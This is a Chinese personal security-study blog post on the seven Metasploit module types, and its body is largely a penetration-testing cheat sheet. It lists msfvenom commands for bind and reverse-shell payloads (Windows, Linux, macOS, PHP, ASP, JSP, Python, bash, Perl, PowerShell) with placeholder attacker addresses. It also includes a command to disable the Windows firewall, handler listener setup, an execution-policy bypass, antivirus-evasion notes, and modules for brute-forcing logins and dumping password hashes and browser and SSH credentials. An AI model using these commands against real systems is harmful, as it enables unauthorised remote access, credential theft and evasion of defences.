<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Pisces","version":"7.7.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="七个模块模块都是用use命令使用，用info查看模块详细信息。show options查看配置信息。search搜索模块。  exploit 漏洞利用模块。对漏洞进行利用。  使用方法：use 模块名，show target 查看模块支持的目标环境 先对目标进行扫描，能够利用再执行攻击模块 反弹回的是cmdshell可以更改payload返回一个meterpreter   payloads 攻击载">
<meta property="og:type" content="article">
<meta property="og:title" content="msf的七个模块">
<meta property="og:url" content="http://yoursite.com/2020/02/26/msf%E7%9A%84%E4%B8%83%E4%B8%AA%E6%A8%A1%E5%9D%97/index.html">
<meta property="og:site_name" content="学习笔记">
<meta property="og:description" content="七个模块模块都是用use命令使用，用info查看模块详细信息。show options查看配置信息。search搜索模块。  exploit 漏洞利用模块。对漏洞进行利用。  使用方法：use 模块名，show target 查看模块支持的目标环境 先对目标进行扫描，能够利用再执行攻击模块 反弹回的是cmdshell可以更改payload返回一个meterpreter   payloads 攻击载">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-02-26T06:02:35.000Z">
<meta property="article:modified_time" content="2020-03-25T10:10:24.537Z">
<meta property="article:author" content="nannanshen">
<meta property="article:tag" content="msf">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://yoursite.com/2020/02/26/msf%E7%9A%84%E4%B8%83%E4%B8%AA%E6%A8%A1%E5%9D%97/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>msf的七个模块 | 学习笔记</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">学习笔记</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">从零开始学习web安全</p>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/02/26/msf%E7%9A%84%E4%B8%83%E4%B8%AA%E6%A8%A1%E5%9D%97/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/touxiang.jpg">
      <meta itemprop="name" content="nannanshen">
      <meta itemprop="description" content="渗透测试">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="学习笔记">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          msf的七个模块
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-02-26 14:02:35" itemprop="dateCreated datePublished" datetime="2020-02-26T14:02:35+08:00">2020-02-26</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-03-25 18:10:24" itemprop="dateModified" datetime="2020-03-25T18:10:24+08:00">2020-03-25</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="七个模块"><a href="#七个模块" class="headerlink" title="七个模块"></a>七个模块</h1><p>模块都是用use命令使用，用info查看模块详细信息。show options查看配置信息。search搜索模块。</p>
<ol>
<li><p>exploit</p>
<p>漏洞利用模块。对漏洞进行利用。</p>
<ul>
<li>使用方法：use 模块名，show target 查看模块支持的目标环境</li>
<li>先对目标进行扫描，能够利用再执行攻击模块</li>
<li>反弹回的是cmdshell可以更改payload返回一个meterpreter</li>
</ul>
</li>
<li><p>payloads</p>
<p>攻击载荷模块。可以执行反弹代码，添加用户等攻击。</p>
<ol>
<li><p>正向payload：会被防火墙拦截</p>
<ul>
<li><p>攻击者去连接目标服务器</p>
</li>
<li><p>使用场景：</p>
<ul>
<li>目标及其不给其他除特定端口外的端口出站</li>
<li>目标处于深层网络，不能直接连通外网，其他机器开了防火墙，也不能通过其他机器连通，通过开着防火墙的机器端口转发达到穿透目的</li>
</ul>
</li>
<li><p>案例：</p>
<p>关闭防火墙：netsh firewall set opmode mode=disable</p>
<ul>
<li>msfvenom -p windows/meterpreter/bind_tcp LPORT=&lt;Attack Port&gt; -f exe &gt; /root/bind_xx.exe</li>
<li>msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=&lt;Attack Port&gt; -f exe &gt;  /root/bind_xx.exe</li>
<li>msfvenom -p windows/meterpreter/bind_tcp LPORT=&lt;Attack Port&gt; -f dll &gt; /root/bind_xx.dll</li>
<li>msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=&lt;Attack Port&gt; -f dll &gt; /root/bind_xx.dll</li>
<li>msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=&lt;Attack Port&gt; -f elf &gt; /root/bind_xx.elf</li>
<li>msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=&lt;Attack Port&gt; -f elf &gt; /root/bind_xx.elf</li>
</ul>
</li>
<li><p>连接：</p>
<p>use exploit/multi/handler</p>
<p>set payload windows/meterpreter/bind_tcp</p>
<p>set rhost &lt;Attack IP&gt;</p>
<p>exploit</p>
</li>
</ul>
</li>
<li><p>反向payload：只要免杀，端口填常用的80,，8080，443，53端口，可以穿透防火墙。</p>
<ul>
<li><p>msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your<br>Port to Connect On&gt; -f exe &gt; shell.exe</p>
<p>cat shell.php | pbcopy &amp;&amp; echo ‘&lt;?php ‘ | tr -d ‘n’&gt; shell.php &amp;&amp; pbpaste &gt;&gt;<br>shell.php</p>
</li>
<li><p>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your<br>Port to Connect On&gt; -f elf &gt; shell.elf</p>
</li>
<li><p>msfvenom -p osx/x86/shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to<br>Connect On&gt; -f macho &gt; shell.macho</p>
<p>webshell</p>
</li>
<li><p>msfvenom -p php/meterpreter_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port<br>to Connect On&gt; -f raw &gt; shell.php</p>
</li>
<li><p>msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your<br>Port to Connect On&gt; -f asp &gt; shell.asp</p>
</li>
<li><p>msfvenom -p java/jsp_shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to<br>Connect On&gt; -f raw\ &gt; shell.jsp</p>
</li>
<li><p>msfvenom -p java/jsp_shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to<br>Connect On&gt; -f war &gt; shell.war</p>
</li>
<li><p>msfvenom -p cmd/unix/reverse_python LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to<br>Connect On&gt; -f raw &gt; shell.py</p>
</li>
<li><p>msfvenom -p cmd/unix/reverse_bash LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to<br>Connect On&gt; -f raw &gt; shell.sh</p>
</li>
<li><p>msfvenom -p cmd/unix/reverse_perl LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to<br>Connect On&gt; -f raw &gt; shell.pl</p>
</li>
<li><p>msfvenom -p windows/x64/meterpreter_reverse_http LHOST=&lt;Your IP Address&gt; LPORT=<br>&lt;Your Port to Connect On&gt; -f psh &gt; shell.ps1<br>powershell.exe -ExecutionPolicy Bypass -File shell.ps1</p>
</li>
<li><p>msf接收：</p>
<p>use exploit/multi/handler</p>
<p>set PAYLOAD windows/meterpreter/reverse_tcp</p>
<p>set LHOST 192.168.88.128</p>
<p>set LPORT 4444</p>
<p>set ExitOnSession false</p>
<p>exploit -j -z</p>
</li>
<li><p>多个连接，用background放到后台，sessions查看存活的</p>
</li>
</ul>
</li>
</ol>
</li>
<li><p>auxiliary</p>
<p>辅助模块。有端口扫描，存活探测，暴力破解等功能。</p>
<p>常用模块：</p>
<ul>
<li><p>端口扫描</p>
<p>auxiliary/scanner/portscan/ack //ACK防火墙扫描<br>auxiliary/scanner/portscan/ftpbounce //FTP跳端口扫描<br>auxiliary/scanner/portscan/syn //SYN端口扫描<br>auxiliary/scanner/portscan/tcp //TCP端口扫描<br>auxiliary/scanner/portscan/xmas //TCP-XMas端口扫描</p>
</li>
<li><p>版本扫描</p>
<p>auxiliary/scanner/smb/smb_version<br>auxiliary/scanner/mssql/mssql_version<br>……</p>
</li>
<li><p>登录爆破</p>
<p>auxiliary/scanner/mssql/mssql_login<br>auxiliary/scanner/smb/smb_login</p>
</li>
<li><p>其他</p>
<p>auxiliary/scanner/mssql/mssql_hashdump //dump密码hash<br>auxiliary/scanner/smb/smb_ms17_010</p>
</li>
<li><p>注：</p>
<p>set rhosts file:/root/ips.txt。批量设置目标ip</p>
<p>​</p>
</li>
</ul>
</li>
<li><p>post</p>
<p>后渗透模块。一般用于内网渗透。在meterpreter里面就可以使用</p>
<p>run post/windows/gather/hashdump 获取密码hash，权限不够可以通过提权以后进行进程迁移。<br>run post/windows/gather/smart_hashdump<br>run post/multi/recon/local_exploit_suggester  提权<br>run post/multi/gather/firefox_creds<br>run post/multi/gather/ssh_creds<br>run post/windows/gather/enum_applications</p>
</li>
<li><p>encoders</p>
<p>编码器模块。对payload进行编码加密，绕过杀软。</p>
</li>
<li><p>evasion</p>
<p>躲避模块。躲避限制和杀软，免杀效果一般。</p>
</li>
<li><p>nops</p>
<p>空指令模块。用以产生缓冲区填充的非操作性指令。</p>
</li>
</ol>
<h1 id="连接数据库"><a href="#连接数据库" class="headerlink" title="连接数据库"></a>连接数据库</h1><h2 id="安装postgresql"><a href="#安装postgresql" class="headerlink" title="安装postgresql"></a>安装postgresql</h2><ul>
<li>apt-get install postgresql -y</li>
</ul>
<h2 id="配置"><a href="#配置" class="headerlink" title="配置"></a>配置</h2><ul>
<li><p>修改postgres系统用户密码</p>
<p>echo “postgres:password” | chpasswd</p>
</li>
<li><p>修改数据库默认用户postgres密码</p>
<p>su postgres</p>
<p>psql</p>
<p>\password postgres</p>
<p>\q</p>
<p>exit</p>
</li>
<li><p>进入msfconsole后连接</p>
<p>db_connect postgres:<a href="mailto:password@127.0.0.1">password@127.0.0.1</a>/msfdb</p>
</li>
<li><p>creds命令查看记录</p>
</li>
</ul>
<h2 id="快捷连接"><a href="#快捷连接" class="headerlink" title="快捷连接"></a>快捷连接</h2><ul>
<li>把 db_connect postgres:<a href="mailto:password@127.0.0.1">password@127.0.0.1</a>/msfdb 保存为文件connection.rc</li>
<li>msfconsole -r connection.rc</li>
</ul>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/msf/" rel="tag"># msf</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/02/25/Windows%E6%8F%90%E6%9D%83/" rel="prev" title="Windows提权">
      <i class="fa fa-chevron-left"></i> Windows提权
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/02/27/windows%E6%8F%90%E6%9D%83%E4%B9%8BUAC%E7%BB%95%E8%BF%87/" rel="next" title="windows提权之UAC绕过">
      windows提权之UAC绕过 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#七个模块"><span class="nav-number">1.</span> <span class="nav-text">七个模块</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#连接数据库"><span class="nav-number">2.</span> <span class="nav-text">连接数据库</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#安装postgresql"><span class="nav-number">2.1.</span> <span class="nav-text">安装postgresql</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#配置"><span class="nav-number">2.2.</span> <span class="nav-text">配置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#快捷连接"><span class="nav-number">2.3.</span> <span class="nav-text">快捷连接</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="nannanshen"
      src="/images/touxiang.jpg">
  <p class="site-author-name" itemprop="name">nannanshen</p>
  <div class="site-description" itemprop="description">渗透测试</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">19</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/nannanshen" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;nannanshen" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title">
      <i class="fa fa-fw fa-link"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://www.dark5.net/" title="https:&#x2F;&#x2F;www.dark5.net&#x2F;" rel="noopener" target="_blank">dark5</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">nannanshen</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v4.2.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> v7.7.1
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
<!-- 页面点击小红心 ,和看板娘冲突了。-->
<!--<script type="text/javascript" src="/js/src/clicklove.js"></script>-->
<!-- 看板娘 -->
<script src="/live2d-widget/autoload.js"></script>